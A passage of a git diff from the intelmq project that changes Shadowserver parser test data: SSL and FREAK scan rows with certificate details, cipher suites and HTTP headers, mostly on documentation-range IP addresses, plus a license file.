charset=UTF-8","keep-alive",,"PHPSESSID=e15bdfa5739c36877608eb4cf46cc388; path=/; secure; HttpO","nginx",,"chunked","Mon, 10 Jan 2022 00:01:44 GMT","N","Y","N","N","unknown","x509: unknown error",,,
+"2022-01-10 00:01:42","34.224.0.0",10443,"","ssl,vpn","TLSv1.2",14618,"US","VIRGINIA","ASHBURN","TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","N",2048,"","Entrust Certification Authority - L1K","2021-10-07 15:30:28","2022-11-06 15:30:28","AD:19:B2:1C:CB:88:70:9B:DB:8E:7E:F5:65:50:13:D6:43:6C:BE:6E","7B388364A24B88E77E5553B5C6748100",2,"sha256WithRSAEncryption","rsaEncryption","Ciena Corporation",,"US","Maryland","Hanover",,,,,,,,"Entrust, Inc.","(c) 2012 Entrust, Inc. - for authorized use only","US",,,,,,,,,,454110,,"N",,"Retail Trade","9A:64:73:0B:8A:FA:DE:22:D4:6D:5A:C6:C4:6F:D4:A4:2A:28:FA:41:1E:FF:81:DC:D4:D9:00:FD:78:DF:C4:DD","9A:B7:BD:68:7D:F3:E7:C1:B7:D3:F4:2F:01:B6:C4:77:90:A3:2B:1E:C0:89:F5:08:EC:43:87:35:60:36:D4:87:61:AA:B8:A8:B3:8A:E9:F1:04:AA:5B:67:12:FF:63:D5:14:80:77:6E:8F:7D:C3:E2:3A:F3:13:DF:08:43:6C:B0","E7:34:BC:92:84:FA:39:DE:E1:46:6C:27:DA:5A:01:F4","HTTP/1.1",200,"OK","text/html",,,,"xxxxxxxx-xxxxx",131,,"Mon, 10 Jan 2022 00:01:44 GMT","Y","N","N","Y","OV",,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_freak.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_freak.csv
index 0105185e0..ab28456b4 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_freak.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/scan_ssl_freak.csv
@@ -1,45 +1,46 @@
-"timestamp","ip","port","hostname","tag","handshake","asn","geo","region","city","cipher_suite","cert_length","subject_common_name","issuer_common_name","cert_issue_date","cert_expiration_date","sha1_fingerprint","cert_serial_number","signature_algorithm","key_algorithm","subject_organization_name","subject_organization_unit_name","subject_country","subject_state_or_province_name","subject_locality_name","subject_street_address","subject_postal_code","subject_surname","subject_given_name","subject_email_address","subject_business_category","subject_serial_number","issuer_organization_name","issuer_organization_unit_name","issuer_country","issuer_state_or_province_name","issuer_locality_name","issuer_street_address","issuer_postal_code","issuer_surname","issuer_given_name","issuer_email_address","issuer_business_category","issuer_serial_number","naics","sic","freak_vulnerable","freak_cipher_suite","sector","sha256_fingerprint","sha512_fingerprint","md5_fingerprint","http_response_type","http_code","http_reason","content_type","http_connection","www_authenticate","set_cookie","server_type","content_length","transfer_encoding","http_date","cert_valid","self_signed","cert_expired","browser_trusted","validation_level","browser_error"
-"2018-04-23 13:25:21","198.51.100.232","443",,"ssl-freak","TLSv1.0","8447","AT","WIEN","VIENNA","TLS_RSA_WITH_RC4_128_SHA","1024","usg50_B0B2DC2FA69D","usg50_B0B2DC2FA69D","2012-05-10 00:01:19","2032-05-05 00:01:19","14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2","4FAB054F","sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,"0","0","Y","TLS_RSA_EXPORT_WITH_RC4_40_MD5",,"57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1","E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87","1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE","HTTP/1.1","200","OK","text/html",,,,,,"chunked","Mon, 23 Apr 2018 13:25:26 GMT","Y","Y","N","N","unknown","x509: unknown error"
-"2018-04-23 13:25:26","198.51.100.224","443","198-51-100-224.example.net","ssl-freak","TLSv1.0","12577","AT","NIEDEROSTERREICH","BADEN","TLS_RSA_WITH_RC4_128_SHA","1024","usg20w_C86C870287EC","usg20w_C86C870287EC","2010-01-01 00:00:53","2029-12-27 00:00:53","14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2","4B3D3B35","sha1WithRSAEncryption","rsaEncryption",,,,,,,,,,,,,,,,,,,,,,,,,"0","0","Y","TLS_RSA_EXPORT_WITH_RC4_40_MD5",,"57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1","E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87","1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE","HTTP/1.1","200","OK","text/html",,,,,,"chunked","Mon, 23 Apr 2018 13:25:29 GMT","Y","Y","N","N","unknown","x509: unknown error"
-2018-04-23 13:25:21,198.51.100.232,443,,ssl-freak,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_B0B2DC2FA69D,usg50_B0B2DC2FA69D,2012-05-10 00:01:19,2032-05-05 00:01:19,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FAB054F,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:26 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:25:26,198.51.100.224,443,198-51-100-224.example.net,ssl-freak,TLSv1.0,12577,AT,NIEDEROSTERREICH,BADEN,TLS_RSA_WITH_RC4_128_SHA,1024,usg20w_C86C870287EC,usg20w_C86C870287EC,2010-01-01 00:00:53,2029-12-27 00:00:53,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4B3D3B35,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:29 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:25:33,198.51.100.67,443,,ssl-freak,TLSv1.0,8447,AT,NIEDEROSTERREICH,WAIDHOFEN AN DER THAYA,TLS_RSA_WITH_RC4_128_SHA,1024,Technicolor TG670,Technicolor TG670,2005-01-01 00:00:00,2024-12-31 00:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,-7A2C610E,sha1WithRSAEncryption,rsaEncryption,Technicolor,1112WT0YK,,,,,,,,,,,Technicolor,1112WT0YK,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Moved Temporarily,,keep-alive,,xAuth_SESSION_ID=bm90aGluZyBoZXJlCg==; path=/;,,0,,"Mon, 23 Apr 2018 14:25:37 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:25:36,198.51.100.3,443,,ssl-freak,TLSv1.2,8445,AT,SALZBURG,HINTERGLEMM,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,2048,uag2100_04BF6D22A5A9,uag2100_04BF6D22A5A9,2016-03-08 20:27:08,2026-03-06 20:27:08,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B0F07D300BDB4FC4,sha256WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:39 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:25:38,198.51.100.198,443,198-51-100-198.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,2048,198-51-100-198.example.net,Go Daddy Secure Certificate Authority - G2,2016-12-29 08:51:00,2019-12-29 08:51:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,AEA6D3637023B56B,sha256WithRSAEncryption,rsaEncryption,,Domain Control Validated,,,,,,,,,,,198-51-100-198.example.net," Inc.""",http://certs.godaddy.com/repository/,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,403,Forbidden ( The server,text/html,close,,,,2024,,,Y,N,N,Y,DV,
-2018-04-23 13:25:38,198.51.100.98,443,198-51-100-98.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_FCF528743754,usg50_FCF528743754,2013-04-29 00:00:26,2033-04-24 00:00:26,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,517DB81A,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:40 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:25:41,198.51.100.156,443,198-51-100-156.example.net,ssl-freak,TLSv1.0,8339,AT,NIEDEROSTERREICH,SCHWECHAT,TLS_RSA_WITH_AES_128_CBC_SHA,1024,usg200_404A036775FC,usg200_404A036775FC,2010-05-01 00:04:04,2030-04-26 00:04:04,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4BDB6FF4,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_DES40_CBC_SHA,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:43 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:25:53,198.51.100.200,443,,ssl-freak,TLSv1.2,8447,AT,NIEDEROSTERREICH,KREMS AN DER DONAU,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB67FC6F,usg20_5CF4AB67FC6F,2015-12-02 00:00:47,2035-11-27 00:00:47,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,565E34AF,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:25:56 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:02,198.51.100.83,443,198-51-100-83.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,usg20w_FCF5286F5972,usg20w_FCF5286F5972,2013-03-23 00:00:43,2033-03-18 00:00:43,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,514CF0AB,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:05 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:03,198.51.100.155,443,198-51-100-155.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,198-51-100-155.example.net,198-51-100-155.example.net,2018-03-19 19:47:07,2023-03-19 19:47:07,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2DF52AA905C7A2B44C2B9F0012FD5745,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,403,Forbidden,text/html,,,,Microsoft-IIS/6.0,1939,,"Mon, 23 Apr 2018 13:11:52 GMT",N,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:03,198.51.100.129,443,198-51-100-129.example.net,ssl-freak,TLSv1.0,29654,AT,SALZBURG,SALZBURG,TLS_RSA_WITH_RC4_128_SHA,1024,localhost,localhost,2007-01-31 19:00:29,2008-01-31 19:00:29,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,2,sha1WithRSAEncryption,rsaEncryption,Apache HTTP Server,Test Certificate,,,,,,,,,,,Apache HTTP Server,For testing purposes only,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache,318,,"Mon, 23 Apr 2018 17:42:37 GMT",N,N,Y,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:26:12,198.51.100.7,443,198-51-100-7.example.net,ssl-freak,TLSv1.0,8445,AT,SALZBURG,ALTENMARKT IM PONGAU,TLS_RSA_WITH_RC4_128_SHA,2048,IMM2-5cf3fcaf3abd,IMM2-5cf3fcaf3abd,2013-03-22 14:32:06,2023-03-20 14:32:06,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,D8C631398B585F10,sha1WithRSAEncryption,rsaEncryption,System X,,US,SomeState,SomeCity,,,,,,,,System X,,US,SomeState,SomeCity,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,301,Moved Permanently,application/x-appweb-php,keep-alive,,,Mbedthis-Appweb/2.4.2,0,,"Mon, 23 Apr 2018 13:37:08 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:15,198.51.100.93,443,,ssl-freak,TLSv1.2,8447,AT,KARNTEN,SPITTAL AN DER DRAU,TLS_RSA_WITH_RC4_128_SHA,1024,usg50_B0B2DC3308EF,usg50_B0B2DC3308EF,2012-05-25 00:00:39,2032-05-20 00:00:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FBECBA7,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:17 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:16,198.51.100.81,443,198-51-100-81.example.net,ssl-freak,TLSv1.0,5385,AT,VORARLBERG,FELDKIRCH,TLS_RSA_WITH_RC4_128_SHA,1024,usg100_5067F03642A5,usg100_5067F03642A5,2010-10-01 00:04:48,2030-09-26 00:04:48,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4CA525A0,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,518210,737415,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:19 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:17,198.51.100.162,443,198-51-100-162.example.net,ssl-freak,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,1024,rc1,Peppercon CA,2003-05-08 16:30:05,2008-05-06 16:30:05,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,18,md5WithRSAEncryption,rsaEncryption,,R&D,DE,SomeState,,,,,,198-51-100-162.example.net,,,,Security Department,DE,SomeState,SomeCity,,,,,198-51-100-162.example.net,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Redirect,,,,,,,,,N,N,Y,N,unknown,x509: certificate signed by unknown authority
-2018-04-23 13:26:22,198.51.100.57,443,,ssl-freak,TLSv1.0,8447,AT,STEIERMARK,GLEISDORF,TLS_RSA_WITH_RC4_128_SHA,1024,usg20_5CF4AB661192,usg20_5CF4AB661192,2015-09-22 00:00:46,2035-09-17 00:00:46,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,56009A2E,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:25 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:28,198.51.100.146,443,198-51-100-146.example.net,ssl-freak,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_RC4_128_SHA,1024,zywall_110_A0E4CB7CE5AF,zywall_110_A0E4CB7CE5AF,2015-01-26 17:19:56,2025-01-23 17:19:56,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,54C6773C,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,Y,TLS_RSA_EXPORT_WITH_RC4_40_MD5,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Mon, 23 Apr 2018 13:26:31 GMT",Y,Y,N,N,unknown,x509: unknown error
-2018-04-23 13:26:34,198.51.100.233,443,,ssl-freak,TLSv1.0,8447,AT,KARNTEN,KLAGENFURT AM WORTHERSEE,TLS_RSA_WITH_RC4_128_SHA,1024,198.51.100.174,198-51-100-174.example.net,2009-04-14 07:26:09,2025-04-15 